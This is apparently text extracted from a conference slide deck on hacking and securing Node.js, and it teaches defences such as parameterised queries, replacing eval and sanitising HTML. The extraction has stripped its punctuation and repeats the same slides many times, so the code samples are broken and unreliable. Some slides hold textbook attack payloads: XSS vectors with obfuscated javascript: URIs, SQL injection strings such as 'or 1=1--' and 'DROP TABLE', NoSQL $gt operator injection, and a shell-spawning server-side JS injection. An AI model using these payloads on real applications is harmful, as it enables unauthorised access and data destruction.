bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Filtering
sitWDF
Context Based Filtering
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Filtering
sitWDF
Context Based Filtering
Protection against JavaScript execution via `url` eg imgssrc andor anchors href attribute Implementation of `urlContextCleaner()`
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Easy Filtering
sitWDF
External HTML Sanitizer
httpsdevelopersgooglecomcaja
The Caja project includes a html-sanitizer
Example
ltscript src=html-sanitizer-minifiedjsgtltscriptgtltscriptgtfunction urlX(url) if(^httpstest(url)) return url function idX(id) return id alert(html_sanitize(ltbgthelloltbgtltimg src=httpasdfgtlta href=javascriptalert(0)gt
ltscript src=httpdfdgtltscriptgt urlX idX))ltscriptgt
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDFsitWDF
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDF
Nodejs is a JavaScript runtime built on Chromes V8 JavaScript engine
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking in Nodejs
sitWDF
Off Course XSS
Improper parsing of nested tags and Incomplete filtering of javascript URIs
lts ltonmouseover=alert(1)gt lts onmouseover=alert(1)gtThis is a testltsgt
lta href=javascriptJ a V a S c R iPtalert(1) ltsgtgttestltagt
(With any Encoding)
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking in Nodejs
sitWDF
Server Side JavaScript Injection
Simple JS Command
responseend(ldquoEnded Responserdquo)
[pid 25170] execve(binsh [binsh -c ls -l user input]
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Hacking in Nodejs
sitWDF
SQL and NoSQL Injection
Classic SQL Injection Bypass
SELECT FROM users WHERE username = $username AND password = $passwordlsquo
(SELECT FROM users WHERE username = or 1=1-- AND password = lsquo)
select author from books where id=$id -gt (select author from books where id=2 or 1=1)
Statement stmt = conncreateStatement(INSERT INTO students VALUES( + user + ))
stmtexecute()
(Robert) DROP TABLE students --)
dbusersfind(username username password password) (NoSQL)
username $gt
password $gt
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Secure Nodejs
sitWDF
Protection
XSS Prevention
bull Sanitize untrusted HTML
httpjsxsscomenindexhtml
httpsgithubcomtheSmawCaja-HTML-Sanitizer
httpswwwowasporgindexphpProjectsOWASP_Node_js_Goat_Project
SSJSI Prevention
bull Substitution of the eval() with the JSONparse() function the code is no longer injectable
bull Use child_processexecFile or child_processspawn instead of child_processexec
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Secure Nodejs
sitWDF
Protection
SQL and NoSQL Injection Prevention
bull Using Parameterize SQL
var q = SELECT name FROM books WHERE id = $1 clientquery(q [3] function(err result) )
bull PreparedStatements avoidprevent SQL Injection
Statement stmt = connprepareStatement(INSERT INTO student VALUES())
stmtsetString(1 user)
stmtexecute()
(Use the $in Operator to Match Values)
dbusersfind(user $in [user] pass $in [pass] ) (NoSQL)
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDF
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Positive Side
bull Social Good find solution for social benefit operations and emergencies
bull Penetration Testing to find vulnerabilities that an attacker could exploit
bull open-source much of this open-source code is produced tested and improved by hackers usually like hackathons
sitWDF
Good Cause
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Negative Side
bull Corruption of government officials (580)
bull Cyber-terrorism (448)
bull Corporate tracking of personal information (446)
bull Terrorist attacks (444)
bull Government tracking of personal information (414)
bull Bio-warfare (409)
bull Identity theft (396)
bull Economic collapse (392)
bull Running out of money in the future (374)
bull Credit card fraud (369)
bull Source Chapman University
sitWDF
Top 10 fears of 2015
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Make Difference
sitWDF
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Make Difference
sitWDFSource Scott Hanselman
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDF
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
Who is the Winner
A Hacker is a state of mind
A ldquoDeveloper is a state of function
sitWDF
Choice is Yours
sitWDF
Thank YouSoumyasanto Sen
soumyasanto
sitWDF
Thank YouSoumyasanto Sen
soumyasanto